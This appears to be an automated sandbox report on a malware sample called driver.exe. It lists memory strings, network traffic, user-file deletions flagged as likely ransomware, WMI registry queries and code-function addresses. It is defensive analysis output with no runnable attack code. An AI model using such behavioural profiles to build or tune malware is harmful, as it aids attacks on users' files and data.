Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: driver.exe, 00000002.00000003.2190639950.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2103195176.000001C0EE37C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335643404.000001C0EE31D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107791950.000001C0EE37C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED9C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441098500.000001C0EE320000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2191367596.000001C0EE311000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435347173.000001C0EE31D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: driver.exe, 00000002.00000002.2445265789.000001C0EF768000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2449471266.00007FF8A861A000.00000004.00000001.01000000.00000011.sdmp, driver.exe, 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\driver.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\CZQKSDDMWR.mp3	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\BJZFPPWAPT.jpg	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\BJZFPPWAPT.jpg	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EOWRVPQCCS.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EWZCVGNOWT.pdf	Jump to behavior

Source: cmd.exe

Process created: 59

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF75425E21C: FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,

77_2_00007FF75425E21C

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF75428B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

77_2_00007FF75428B57C

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP7761.tmp
Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP5687.tmp

Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B8BD0	0_2_00007FF6A29B8BD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D69D4	0_2_00007FF6A29D69D4
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D0938	0_2_00007FF6A29D0938
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B1000	0_2_00007FF6A29B1000
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C1BC0	0_2_00007FF6A29C1BC0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29BA34B	0_2_00007FF6A29BA34B
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29BA4E4	0_2_00007FF6A29BA4E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29BAD1D	0_2_00007FF6A29BAD1D
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D5C70	0_2_00007FF6A29D5C70
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C2C80	0_2_00007FF6A29C2C80
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D3C80	0_2_00007FF6A29D3C80
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D0938	0_2_00007FF6A29D0938
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D6488	0_2_00007FF6A29D6488
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C21D4	0_2_00007FF6A29C21D4
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C3A14	0_2_00007FF6A29C3A14
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C8154	0_2_00007FF6A29C8154
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C19B4	0_2_00007FF6A29C19B4
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29CDACC	0_2_00007FF6A29CDACC
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C1FD0	0_2_00007FF6A29C1FD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C8804	0_2_00007FF6A29C8804
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29CDF60	0_2_00007FF6A29CDF60
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D9798	0_2_00007FF6A29D9798
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C17B0	0_2_00007FF6A29C17B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D18E4	0_2_00007FF6A29D18E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D411C	0_2_00007FF6A29D411C
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B9870	0_2_00007FF6A29B9870
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29CE5E0	0_2_00007FF6A29CE5E0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C1DC4	0_2_00007FF6A29C1DC4
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C3610	0_2_00007FF6A29C3610
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C5DA0	0_2_00007FF6A29C5DA0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D5EEC	0_2_00007FF6A29D5EEC
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29C9F10	0_2_00007FF6A29C9F10
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D5C70	2_2_00007FF6A29D5C70
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D69D4	2_2_00007FF6A29D69D4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B1000	2_2_00007FF6A29B1000
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C1BC0	2_2_00007FF6A29C1BC0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B8BD0	2_2_00007FF6A29B8BD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29BA34B	2_2_00007FF6A29BA34B
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29BA4E4	2_2_00007FF6A29BA4E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29BAD1D	2_2_00007FF6A29BAD1D
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C2C80	2_2_00007FF6A29C2C80
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D3C80	2_2_00007FF6A29D3C80
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D0938	2_2_00007FF6A29D0938
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D6488	2_2_00007FF6A29D6488
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C21D4	2_2_00007FF6A29C21D4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C3A14	2_2_00007FF6A29C3A14
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D0938	2_2_00007FF6A29D0938
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C8154	2_2_00007FF6A29C8154
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C19B4	2_2_00007FF6A29C19B4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29CDACC	2_2_00007FF6A29CDACC
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C1FD0	2_2_00007FF6A29C1FD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C8804	2_2_00007FF6A29C8804
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29CDF60	2_2_00007FF6A29CDF60
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D9798	2_2_00007FF6A29D9798
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C17B0	2_2_00007FF6A29C17B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D18E4	2_2_00007FF6A29D18E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D411C	2_2_00007FF6A29D411C
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B9870	2_2_00007FF6A29B9870
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29CE5E0	2_2_00007FF6A29CE5E0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C1DC4	2_2_00007FF6A29C1DC4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C3610	2_2_00007FF6A29C3610
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C5DA0	2_2_00007FF6A29C5DA0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D5EEC	2_2_00007FF6A29D5EEC
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29C9F10	2_2_00007FF6A29C9F10
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8030330	2_2_00007FF8A8030330
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A7F81950	2_2_00007FF8A7F81950
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A7F82270	2_2_00007FF8A7F82270
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A7F81300	2_2_00007FF8A7F81300
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8085C00	2_2_00007FF8A8085C00
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8078920	2_2_00007FF8A8078920
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041EE2	2_2_00007FF8A8041EE2
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041618	2_2_00007FF8A8041618
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041A0F	2_2_00007FF8A8041A0F
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8042617	2_2_00007FF8A8042617
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80BAC80	2_2_00007FF8A80BAC80
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A804149C	2_2_00007FF8A804149C
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041CBC	2_2_00007FF8A8041CBC
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041B54	2_2_00007FF8A8041B54
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A804117C	2_2_00007FF8A804117C
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8042702	2_2_00007FF8A8042702
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041D93	2_2_00007FF8A8041D93
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80416FE	2_2_00007FF8A80416FE
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8048720	2_2_00007FF8A8048720
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A804116D	2_2_00007FF8A804116D
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80B8870	2_2_00007FF8A80B8870
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A808D980	2_2_00007FF8A808D980
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041596	2_2_00007FF8A8041596
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8107A20	2_2_00007FF8A8107A20
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8089A60	2_2_00007FF8A8089A60
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A806BAE0	2_2_00007FF8A806BAE0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A804155A	2_2_00007FF8A804155A
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80421E4	2_2_00007FF8A80421E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041FDC	2_2_00007FF8A8041FDC
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A808DE50	2_2_00007FF8A808DE50
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041546	2_2_00007FF8A8041546
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041AD7	2_2_00007FF8A8041AD7
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8066030	2_2_00007FF8A8066030
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80424DC	2_2_00007FF8A80424DC
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80AD2D0	2_2_00007FF8A80AD2D0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80417F8	2_2_00007FF8A80417F8
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041C12	2_2_00007FF8A8041C12
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80B3650	2_2_00007FF8A80B3650
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80421C6	2_2_00007FF8A80421C6
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80413DE	2_2_00007FF8A80413DE
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041654	2_2_00007FF8A8041654
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8619060	2_2_00007FF8A8619060
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86B29E0	2_2_00007FF8A86B29E0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86D4CF0	2_2_00007FF8A86D4CF0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8669D10	2_2_00007FF8A8669D10
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86CCFB0	2_2_00007FF8A86CCFB0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86722E0	2_2_00007FF8A86722E0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86692C0	2_2_00007FF8A86692C0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8666940	2_2_00007FF8A8666940
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8695910	2_2_00007FF8A8695910
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8679A30	2_2_00007FF8A8679A30
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A865FA20	2_2_00007FF8A865FA20
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86A6BD0	2_2_00007FF8A86A6BD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86B4BB0	2_2_00007FF8A86B4BB0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8659BA0	2_2_00007FF8A8659BA0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86BBB80	2_2_00007FF8A86BBB80
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8702C60	2_2_00007FF8A8702C60
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A866CC40	2_2_00007FF8A866CC40
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8653C10	2_2_00007FF8A8653C10
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A868CCE9	2_2_00007FF8A868CCE9
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86ACCD0	2_2_00007FF8A86ACCD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86ABD50	2_2_00007FF8A86ABD50
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A865BD40	2_2_00007FF8A865BD40
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86DAD20	2_2_00007FF8A86DAD20
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86E8D00	2_2_00007FF8A86E8D00
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8660DD0	2_2_00007FF8A8660DD0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A867DE40	2_2_00007FF8A867DE40
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86ECF20	2_2_00007FF8A86ECF20
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8694F00	2_2_00007FF8A8694F00
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86DC040	2_2_00007FF8A86DC040
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8705030	2_2_00007FF8A8705030
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86770D0	2_2_00007FF8A86770D0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86780B0	2_2_00007FF8A86780B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8654120	2_2_00007FF8A8654120
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86621F0	2_2_00007FF8A86621F0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A86531A5	2_2_00007FF8A86531A5
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A866D2B0	2_2_00007FF8A866D2B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF8460A441A	47_2_00007FF8460A441A
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424B540	77_2_00007FF75424B540
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754241884	77_2_00007FF754241884
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754251180	77_2_00007FF754251180
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542482F0	77_2_00007FF7542482F0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542554C0	77_2_00007FF7542554C0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75426AE10	77_2_00007FF75426AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754250A2C	77_2_00007FF754250A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754277B24	77_2_00007FF754277B24
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424ABA0	77_2_00007FF75424ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75426F5B0	77_2_00007FF75426F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75427F59C	77_2_00007FF75427F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754258598	77_2_00007FF754258598
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75429260C	77_2_00007FF75429260C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542765FC	77_2_00007FF7542765FC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754297660	77_2_00007FF754297660
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542A86D4	77_2_00007FF7542A86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542586C4	77_2_00007FF7542586C4
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75427A710	77_2_00007FF75427A710
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754280710	77_2_00007FF754280710
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754282700	77_2_00007FF754282700
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542517C8	77_2_00007FF7542517C8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542667E0	77_2_00007FF7542667E0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754252890	77_2_00007FF754252890
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754248884	77_2_00007FF754248884
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542918A8	77_2_00007FF7542918A8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75428190C	77_2_00007FF75428190C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754270904	77_2_00007FF754270904
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542738E8	77_2_00007FF7542738E8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754282164	77_2_00007FF754282164
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542A41CC	77_2_00007FF7542A41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542881CC	77_2_00007FF7542881CC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75424F24C	77_2_00007FF75424F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754267244	77_2_00007FF754267244
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75425E21C	77_2_00007FF75425E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF754292268	77_2_00007FF754292268
